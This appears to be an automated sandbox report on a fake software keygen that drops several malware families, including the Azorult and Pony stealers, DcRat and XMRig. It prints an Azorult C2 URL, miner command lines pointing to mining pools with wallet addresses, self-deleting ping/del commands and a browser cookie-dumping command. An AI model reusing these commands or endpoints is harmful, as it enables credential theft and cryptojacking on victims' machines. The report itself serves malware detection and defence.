Analysis

  • max time kernel
    423s
  • max time network
    562s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    02-04-2021 05:02

General

  • Target

    Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe

  • Size

    4.8MB

  • MD5

    61e0e846e4a326fbe9f8cb873d644c6a

  • SHA1

    a7fd6f5772d2a594972919743651c25309d7e622

  • SHA256

    548af4c5f5e7897cca22f8f1629a06788d05c0ca9df90d4bc034a105ae5c875c

  • SHA512

    2a064775995677be01ce0924431a8823dc767868ddf8a219cccf87af206f295868c7edb54e2304b84c9e50849438df5fa085081c1b5f277f3c405adbdeb5965c

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 26 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe
    "C:\Users\Admin\AppData\Local\Temp\Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4088
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4128
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
            • Executes dropped EXE
            PID:4248
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
        keygen-step-1.exe
        3⤵
        • Executes dropped EXE
        PID:800
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
        keygen-step-3.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:640
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4232
          • C:\Windows\SysWOW64\PING.EXE
            ping 1.1.1.1 -n 1 -w 3000
            5⤵
            • Runs ping.exe
            PID:4328
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
        keygen-step-4.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2324
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4176
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4400
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im chrome.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4580
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im chrome.exe
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4624
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4752
          • C:\Users\Admin\AppData\Roaming\889E.tmp.exe
            "C:\Users\Admin\AppData\Roaming\889E.tmp.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:4896
            • C:\Users\Admin\AppData\Roaming\889E.tmp.exe
              "C:\Users\Admin\AppData\Roaming\889E.tmp.exe"
              6⤵
              • Executes dropped EXE
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:5108
          • C:\Users\Admin\AppData\Roaming\895B.tmp.exe
            "C:\Users\Admin\AppData\Roaming\895B.tmp.exe"
            5⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4924
            • C:\Windows\system32\msiexec.exe
              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
              6⤵
                PID:5040
              • C:\Windows\system32\msiexec.exe
                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
                6⤵
                • Blocklisted process makes network request
                PID:744
            • C:\Users\Admin\AppData\Roaming\8A17.tmp.exe
              "C:\Users\Admin\AppData\Roaming\8A17.tmp.exe"
              5⤵
              • Executes dropped EXE
              PID:4976
              • C:\Windows\SysWOW64\cmd.exe
                /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\8A17.tmp.exe
                6⤵
                  PID:3756
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 3
                    7⤵
                    • Delays execution with timeout.exe
                    PID:4788
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                5⤵
                  PID:5056
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1
                    6⤵
                    • Runs ping.exe
                    PID:3676
              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                4⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                PID:648
              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                4⤵
                • Executes dropped EXE
                PID:4380
                • C:\ProgramData\5302290.exe
                  "C:\ProgramData\5302290.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2332
                • C:\ProgramData\6744353.exe
                  "C:\ProgramData\6744353.exe"
                  5⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:4460
                  • C:\ProgramData\Windows Host\Windows Host.exe
                    "C:\ProgramData\Windows Host\Windows Host.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:2248
                • C:\ProgramData\132991.exe
                  "C:\ProgramData\132991.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4820
                  • C:\ProgramData\132991.exe
                    "{path}"
                    6⤵
                    • Executes dropped EXE
                    PID:3644
                  • C:\ProgramData\132991.exe
                    "{path}"
                    6⤵
                    • Executes dropped EXE
                    PID:2692
                  • C:\ProgramData\132991.exe
                    "{path}"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4164
                • C:\ProgramData\3330741.exe
                  "C:\ProgramData\3330741.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4264
              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:4716
                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  5⤵
                  • Executes dropped EXE
                  PID:1140
                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  5⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4144

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/744-82-0x0000000140000000-0x000000014070A000-memory.dmp

          Filesize

          7.0MB

        • memory/744-84-0x000002466CF20000-0x000002466CF40000-memory.dmp

          Filesize

          128KB

        • memory/744-83-0x0000000140000000-0x000000014070A000-memory.dmp

          Filesize

          7.0MB

        • memory/744-81-0x000002466CED0000-0x000002466CEE4000-memory.dmp

          Filesize

          80KB

        • memory/744-177-0x000002466CF40000-0x000002466CF60000-memory.dmp

          Filesize

          128KB

        • memory/744-79-0x0000000140000000-0x000000014070A000-memory.dmp

          Filesize

          7.0MB

        • memory/2248-162-0x0000000005740000-0x0000000005741000-memory.dmp

          Filesize

          4KB

        • memory/2248-149-0x0000000070E90000-0x000000007157E000-memory.dmp

          Filesize

          6.9MB

        • memory/2332-113-0x00000000016A0000-0x00000000016A1000-memory.dmp

          Filesize

          4KB

        • memory/2332-129-0x0000000005640000-0x0000000005641000-memory.dmp

          Filesize

          4KB

        • memory/2332-140-0x0000000002FB0000-0x0000000002FB1000-memory.dmp

          Filesize

          4KB

        • memory/2332-105-0x0000000000D00000-0x0000000000D01000-memory.dmp

          Filesize

          4KB

        • memory/2332-133-0x0000000004FD0000-0x0000000005002000-memory.dmp

          Filesize

          200KB

        • memory/2332-101-0x0000000070E90000-0x000000007157E000-memory.dmp

          Filesize

          6.9MB

        • memory/4128-26-0x0000000002E60000-0x0000000002FFC000-memory.dmp

          Filesize

          1.6MB

        • memory/4128-52-0x00000000036D0000-0x00000000037BF000-memory.dmp

          Filesize

          956KB

        • memory/4128-53-0x0000000001030000-0x0000000001031000-memory.dmp

          Filesize

          4KB

        • memory/4128-54-0x0000000001020000-0x000000000103B000-memory.dmp

          Filesize

          108KB

        • memory/4164-196-0x00000000060E0000-0x00000000060E1000-memory.dmp

          Filesize

          4KB

        • memory/4164-191-0x0000000005BB0000-0x0000000005BB1000-memory.dmp

          Filesize

          4KB

        • memory/4164-186-0x0000000070E90000-0x000000007157E000-memory.dmp

          Filesize

          6.9MB

        • memory/4164-190-0x0000000005820000-0x0000000005821000-memory.dmp

          Filesize

          4KB

        • memory/4164-195-0x0000000005E80000-0x0000000005E81000-memory.dmp

          Filesize

          4KB

        • memory/4164-194-0x0000000005E40000-0x0000000005E41000-memory.dmp

          Filesize

          4KB

        • memory/4164-189-0x00000000055C0000-0x00000000055C1000-memory.dmp

          Filesize

          4KB

        • memory/4164-182-0x0000000000400000-0x0000000000430000-memory.dmp

          Filesize

          192KB

        • memory/4164-192-0x0000000006350000-0x0000000006351000-memory.dmp

          Filesize

          4KB

        • memory/4164-193-0x0000000005DE0000-0x0000000005DE1000-memory.dmp

          Filesize

          4KB

        • memory/4164-197-0x0000000006E70000-0x0000000006E71000-memory.dmp

          Filesize

          4KB

        • memory/4164-198-0x0000000007570000-0x0000000007571000-memory.dmp

          Filesize

          4KB

        • memory/4176-27-0x0000000000890000-0x0000000000891000-memory.dmp

          Filesize

          4KB

        • memory/4176-37-0x000000001B740000-0x000000001B742000-memory.dmp

          Filesize

          8KB

        • memory/4176-25-0x00007FFB55F40000-0x00007FFB5692C000-memory.dmp

          Filesize

          9.9MB

        • memory/4248-38-0x0000000000400000-0x0000000000983000-memory.dmp

          Filesize

          5.5MB

        • memory/4248-30-0x0000000000400000-0x0000000000983000-memory.dmp

          Filesize

          5.5MB

        • memory/4264-141-0x0000000004FE0000-0x000000000501B000-memory.dmp

          Filesize

          236KB

        • memory/4264-117-0x0000000070E90000-0x000000007157E000-memory.dmp

          Filesize

          6.9MB

        • memory/4264-164-0x0000000005260000-0x0000000005261000-memory.dmp

          Filesize

          4KB

        • memory/4264-150-0x00000000051C0000-0x00000000051C1000-memory.dmp

          Filesize

          4KB

        • memory/4264-123-0x0000000000840000-0x0000000000841000-memory.dmp

          Filesize

          4KB

        • memory/4264-143-0x0000000005160000-0x0000000005161000-memory.dmp

          Filesize

          4KB

        • memory/4264-136-0x0000000004FD0000-0x0000000004FD1000-memory.dmp

          Filesize

          4KB

        • memory/4380-89-0x00007FFB55BC0000-0x00007FFB565AC000-memory.dmp

          Filesize

          9.9MB

        • memory/4380-93-0x0000000000D60000-0x0000000000D79000-memory.dmp

          Filesize

          100KB

        • memory/4380-94-0x0000000000B20000-0x0000000000B21000-memory.dmp

          Filesize

          4KB

        • memory/4380-95-0x0000000000DF0000-0x0000000000DF2000-memory.dmp

          Filesize

          8KB

        • memory/4380-92-0x0000000000B10000-0x0000000000B11000-memory.dmp

          Filesize

          4KB

        • memory/4380-90-0x0000000000610000-0x0000000000611000-memory.dmp

          Filesize

          4KB

        • memory/4460-132-0x0000000004F40000-0x0000000004F41000-memory.dmp

          Filesize

          4KB

        • memory/4460-130-0x000000000DA40000-0x000000000DA41000-memory.dmp

          Filesize

          4KB

        • memory/4460-122-0x0000000004DC0000-0x0000000004DD4000-memory.dmp

          Filesize

          80KB

        • memory/4460-108-0x00000000005A0000-0x00000000005A1000-memory.dmp

          Filesize

          4KB

        • memory/4460-137-0x00000000027A0000-0x00000000027A1000-memory.dmp

          Filesize

          4KB

        • memory/4460-104-0x0000000070E90000-0x000000007157E000-memory.dmp

          Filesize

          6.9MB

        • memory/4460-119-0x0000000004D30000-0x0000000004D31000-memory.dmp

          Filesize

          4KB

        • memory/4460-127-0x000000000DE60000-0x000000000DE61000-memory.dmp

          Filesize

          4KB

        • memory/4752-64-0x0000000000400000-0x0000000000444000-memory.dmp

          Filesize

          272KB

        • memory/4752-45-0x0000000000F40000-0x0000000000F4D000-memory.dmp

          Filesize

          52KB

        • memory/4820-134-0x0000000004BD0000-0x0000000004BD1000-memory.dmp

          Filesize

          4KB

        • memory/4820-179-0x0000000008980000-0x00000000089E0000-memory.dmp

          Filesize

          384KB

        • memory/4820-142-0x00000000082A0000-0x0000000008332000-memory.dmp

          Filesize

          584KB

        • memory/4820-112-0x0000000070E90000-0x000000007157E000-memory.dmp

          Filesize

          6.9MB

        • memory/4820-139-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

          Filesize

          4KB

        • memory/4820-178-0x0000000008A30000-0x0000000008AD7000-memory.dmp

          Filesize

          668KB

        • memory/4820-145-0x0000000006F00000-0x0000000006F05000-memory.dmp

          Filesize

          20KB

        • memory/4820-147-0x00000000083E0000-0x00000000083E1000-memory.dmp

          Filesize

          4KB

        • memory/4820-138-0x0000000004A90000-0x0000000004A91000-memory.dmp

          Filesize

          4KB

        • memory/4820-118-0x00000000001D0000-0x00000000001D1000-memory.dmp

          Filesize

          4KB

        • memory/4896-65-0x0000000004800000-0x0000000004801000-memory.dmp

          Filesize

          4KB

        • memory/4896-72-0x0000000002CF0000-0x0000000002D37000-memory.dmp

          Filesize

          284KB

        • memory/4976-85-0x0000000007550000-0x000000000C9CC000-memory.dmp

          Filesize

          84.5MB

        • memory/4976-96-0x0000000000400000-0x000000000587C000-memory.dmp

          Filesize

          84.5MB

        • memory/5040-66-0x0000000140000000-0x0000000140383000-memory.dmp

          Filesize

          3.5MB

        • memory/5040-74-0x0000000140000000-0x0000000140383000-memory.dmp

          Filesize

          3.5MB

        • memory/5108-69-0x0000000000400000-0x000000000044E000-memory.dmp

          Filesize

          312KB

        • memory/5108-73-0x0000000000400000-0x000000000044E000-memory.dmp

          Filesize

          312KB